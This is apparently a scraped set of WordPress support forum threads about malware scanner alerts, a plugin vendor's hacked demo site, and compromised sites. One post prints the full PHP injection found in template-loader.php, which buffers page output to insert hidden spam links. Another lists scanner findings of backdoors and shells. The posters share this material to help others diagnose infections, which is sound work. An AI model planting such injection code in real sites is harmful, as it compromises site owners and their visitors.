When scanning my site, Quttera says that the file wp-ui.js is potentially suspicious. I just downloaded the file and uploaded it fresh and get the same results from the scan.
Any advice?
Thanks,
Amy
WP UI - Tabs, Accordions, Sliders
↧
amyboyack on "Quttera says wp-ui.js is potentially suspicious"
↧
ClaytonJames on "Quttera says wp-ui.js is potentially suspicious"
The scanner is probably just alerting on eval(function(p,a,c,k,e,r) The file has compressed content. The packer has legitimate uses, but it's also sometimes used to hide malware.
Here's the decompressed content if you would like to take a look through it. http://pastebin.com/Cz0tN78z
[edit] ..I have no affiliation with the plugin. :-)
↧
↧
amyboyack on "Quttera says wp-ui.js is potentially suspicious"
Thank you for responding. I wasn't sure why it was saying this was suspicious. You have cleared that up for me.
↧
ClaytonJames on "Quttera says wp-ui.js is potentially suspicious"
You're welcome!
↧
mnahrgang on "Site hacked despite several Hardening-Tools and gotmls finding nothing..."
I have a problem with my site. It has been hacked several times now, and I always restored my last backup, which is supposed to be clean (at least all Tools like Sucuri and others tell so).
After a few days or weeks it is hacked again. Google Webmaster-Tools tell me, there is malware in the URL:
Malware-Code eingeschleust,http://www.unixhelpdesk.de/,24.01.14,"""
[Code moderated. Please do not post potential hack code blocks in the forums. Please use the pastebin]
O.K., I see this is an encrypted URL and always the date of infection is part of the URL (http://www.unixhelpdesk.de/,24.01.14). But I cannot get rid of it for a long time. The Site will be infected again, if I restore it from backup. Changed Password etc. And cannot find the reason...
Does anybody know exactly this problem and found a solution?
↧
↧
mrsreeder on "[Plugin: Wordfence Security] False Positives? I hope..."
I just had two sites come back with suspected malware from Revolution Slider files.
revslider/rs-plugin/css/settings.css
revslider/revslider.php
revslider/inc_php/revslider_globals.class.php
Are these false positives or should I be concerned about finding another plugin?
Scanned both sites with Sucuri and found nothing.
↧
mrsreeder on "[Plugin: Wordfence Security] False Positives? I hope..."
Just noticed that Chrome is blocking the plugin page for Revolution Slider on Code Canyon too. That can't be good.
↧
Oldrag on "[Plugin: Wordfence Security] False Positives? I hope..."
public_html/wp-content/plugins/revslider/inc_php/revslider_globals.class.php
public_html/wp-content/plugins/revslider/revslider.php
public_html/wp-content/plugins/revslider/rs-plugin/css/settings.css
public_html/wp-content/plugins/revslider/views/templates/sliders.php
I´m using a paid theme (that includes the revolution slider). Anyone could confirm if those alerts are false positives?
↧
onlyred on "[Plugin: Wordfence Security] False Positives? I hope..."
Just came here looking for the same thing, also getting malware warnings from WF on revolution :(
↧
↧
Wordfence on "[Plugin: Wordfence Security] False Positives? I hope..."
Looks like:
www dot themepunch dot com/codecanyon/revolution_wp/
is the culprit? Not sure why their site was flagged by google, it may have gotten hacked.
The reason Sucuri didn't find anything is because they can't scan your PHP source code with a remote scan like Wordfence does.
You can either remove the slider or wait this out until the site is fixed and marked clean by google. Keep in mind that if that URL is indexible by Google's crawlers you may incur an SEO penalty.
Regards,
Mark.
↧
Wordfence on "[Plugin: Wordfence Security] False Positives? I hope..."
So just to be clear, this is not a false positive from Wordfence since Google has in fact flagged the URL as malware.
Regards,
Mark.
↧
Sammy2 on "[Plugin: Wordfence Security] False Positives? I hope..."
I got the warning this morning on 3 of my sites. I am using Wordfence. You mention above to remove the slider - does that mean deleting the plugin - or just remove the slider from the site pages?
Thanks,
↧
Wordfence on "[Plugin: Wordfence Security] False Positives? I hope..."
I meant delete the plugin. But before you do that please contact the plugin author for more info. They can probably explain why their site has been flagged and you can probably ignore that warning.
Regards,
Mark.
↧
↧
Badex on "[Plugin: Wordfence Security] False Positives? I hope..."
I have the same warning on http://www.mindfulnessdublin.com. Does anyone have more information?
↧
Badex on "[Plugin: Wordfence Security] False Positives? I hope..."
* File contains suspected malware URL: wp-content/plugins/revslider/inc_php/revslider_globals.class.php
* File contains suspected malware URL: wp-content/plugins/revslider/revslider.php
* File contains suspected malware URL: wp-content/plugins/revslider/rs-plugin/css/settings.css
* File contains suspected malware URL: wp-content/plugins/revslider/views/templates/sliders.php
↧
Badex on "[Plugin: Wordfence Security] False Positives? I hope..."
This is what Themepunch are saying in case anyone else has this problem.
Hi,
Thanks a lot for your question.
First of all i want to tell again, everything is safe and Clean. You dont need to update the Plugin neither to worry about any mailware or similiar viruses or trojans.
None of our plugins or themes was influenced to any time, and all Items and Downloadable files are , were and will be clean !
Some Background information:
We transfered some of our webservers and Domains to a new and better Provider today night, and during this transfer we have been attacked. Some of our Demo content has been influenced.
We fixed the issue in a very short time, however Google Blocked us without any real reason. Google just unlocked the sites, and also decleared all our Content as Clean and safety.
Thanks a lot again and have a great day, and please do not hesitate to contact us any time if you have further questions.
Cheers,
Your ThemePunch
↧
Oldrag on "[Plugin: Wordfence Security] False Positives? I hope..."
Thank's for the information Mark and Badex, I was about to write to Themepunch, so it seems we´ll just have to wait till google unflag themepunch.... (i hope)
↧
↧
Eli on "Site hacked despite several Hardening-Tools and gotmls finding nothing..."
Are you using my anti-malware plugin on this site?
If so, have you downloaded the latest definition update and then ran a Complete Scan of the whole site?
If so, What does it find? If no known threats what potential threats are found?
Is this a shared hosting environment? How many other sites do you have on this server? Have you checked all the other sites with my plugin too?
If you can answer all these question I can can offer more help...
Aloha, Eli
↧
theather on "Site hacked via template-loader.php File (mx_start)"
I'm not sure where this problem came from, but so far I've seen no other information on it (Google is my friend). So, I'm hoping this will help someone else with the same problem.
In a relatively new WordPress Site, I found there was a large white space at the bottom of my pages which was caused by a series of <div>,<a> and <br> tags somehow inserted after the footer content. There was a bunch of positioning so all the div's were out of site above the page, but the break tags littered the visible area. The anchors were to a variety of Viagra and other medication ads. I'm guessing these are simply links to improve Search Engine ratings, or to generate ad revenue for simply showing them to you (but they aren't actually visible).
The hack was in /wp-includes/template-loader.php
Where the file normally ends like with these lines:
...
if ( $template = apply_filters( 'template_include', $template ) )
include( $template );
return;
endif;I found a much different block:
if ( $template = apply_filters( 'template_include', $template ) )
/*mx_start*/{ function mx_callback($mx_body) {
$mx_links = array( /*... LONG list of HTML blocks removed ...*/ );
$mx_diapasone = "40-50";
if(strstr($mx_diapasone, "-"))
{
$diaps = explode("-", $mx_diapasone);
$need = rand($diaps[0], $diaps[1]);
}else{
$need = $mx_diapasone;
}
$mx_links = array_slice($mx_links, 0, $need);
$mx_rules = array("<body>*", "*</body>");
function mx_insert($mx_body, $mx_rules, $mx_data)
{
foreach($mx_rules as $rule)
{
$no_star = str_replace('*', '', $rule);
if(stristr($mx_body, $no_star))
{
$new = (substr($rule, 0, 1) == "*")? $mx_data . $no_star : $no_star. $mx_data;
$patt = '#' . preg_quote($no_star) . '#i';
$mx_body = preg_replace($patt, $new, $mx_body, 1);
break;
}
}
return $mx_body;
}
$mx_body = mx_insert($mx_body, $mx_rules, implode("<br />", $mx_links));
return $mx_body; }
ob_start("mx_callback");include( $template );
ob_end_flush(); }/*mx_end*/ /*mx_orig_startinclude( $template ); mx_orig_end*/
return;
endif;The code appears to take a slice from the list of ads in mx_links and inserts them into the page with only the odd white space as a symptom.
↧
LindaHeron on "I've been hacked!"
Hi our website is hosted at NetFirms, and our website has been hacked - viagra commercials. I am a novice and am not sure I can fix this myself. Netfirms did a scan and found 14 files that have been infected with Malware. They suggested I delete the infected files (I have no idea how to do that) and purchase SiteLock Premium to clean and protect my site at http://www.vermilionriverstewards.ca. We are a not-for-profit and have a very limited budget, so I'm wondering if there is anyone out there who can help me.
The infected files:
/home/users/web/b2731/nf.vermilionriverstewards/public_html/vermilionriverstewards.ca/configweb/config.root: SiteLock-PHP-CPANEL-b.UNOFFICIAL FOUND
/home/users/web/b2731/nf.vermilionriverstewards/public_html/vermilionriverstewards.ca/configweb/.htaccess: EIG.Hacktool.HTAccess.Root-1.UNOFFICIAL FOUND
/home/users/web/b2731/nf.vermilionriverstewards/public_html/vermilionriverstewards.ca/wp-rss3.php: SiteLock-PHP-INJECTOR-1.UNOFFICIAL FOUND
/home/users/web/b2731/nf.vermilionriverstewards/public_html/vermilionriverstewards.ca/wp-content/themes/purevision/functions.php: LONGDEF.PHP.Spam-Links-009N.UNOFFICIAL FOUND
/home/users/web/b2731/nf.vermilionriverstewards/public_html/vermilionriverstewards.ca/wp-content/themes/purevision/scripts/admin/uploadify/Shell.php: SiteLock-PHP-BACKDOOR-GENERIC-md5-to.UNOFFICIAL FOUND
/home/users/web/b2731/nf.vermilionriverstewards/public_html/vermilionriverstewards.ca/wp-content/themes/purevision/scripts/admin/uploadify/uploadify.php: EIG.Hacktool.Deface.Tag-63.UNOFFICIAL FOUND
/home/users/web/b2731/nf.vermilionriverstewards/public_html/vermilionriverstewards.ca/wp-content/themes/purevision/scripts/DD_belatedPNG_0.0.8a-min.php: JCDEF.PHP.INJECTOR-01N.UNOFFICIAL FOUND
/home/users/web/b2731/nf.vermilionriverstewards/public_html/vermilionriverstewards.ca/wp-content/themes/purevision/scripts/timthumb.renamed.txt: EIG.PHP.TimThumb-108.UNOFFICIAL FOUND
/home/users/web/b2731/nf.vermilionriverstewards/public_html/vermilionriverstewards.ca/wp-content/plugins/weather-de.php: SiteLock-PHP-MINISHELL-1-g.UNOFFICIAL FOUND
/home/users/web/b2731/nf.vermilionriverstewards/public_html/vermilionriverstewards.ca/wp-content/uploads/2011/03/purevision.zip: EIG.PHP.TimThumb-108.UNOFFICIAL FOUND
/home/users/web/b2731/nf.vermilionriverstewards/public_html/vermilionriverstewards.ca/chpass.sh: SiteLock-PHP-BACKDOOR-GENERIC-md5-qr.UNOFFICIAL FOUND
/home/users/web/b2731/nf.vermilionriverstewards/public_html/vermilionriverstewards.ca/sym/.htaccess: EIG.Hacktool.HTAccess.DirIndex-1.UNOFFICIAL FOUND
/home/users/web/b2731/nf.vermilionriverstewards/public_html/vermilionriverstewards.ca/index.htm: SiteLock-JS-SEOSPAM-g.UNOFFICIAL FOUND
/home/users/web/b2731/nf.vermilionriverstewards/public_html/vermilionriverstewards.ca/groupx.php: SiteLock-PHP-BACKDOOR-GENERIC-md5-n.UNOFFICIAL FOUND
----------- SCAN SUMMARY -----------
Known viruses: 4389639
Engine version: 0.96.3
Scanned directories: 554
Scanned files: 4939
Infected files: 14
Data scanned: 1346.86 MB
Data read: 1532.18 MB (ratio 0.88:1)
Time: 624.750 sec (10 m 24 s)↧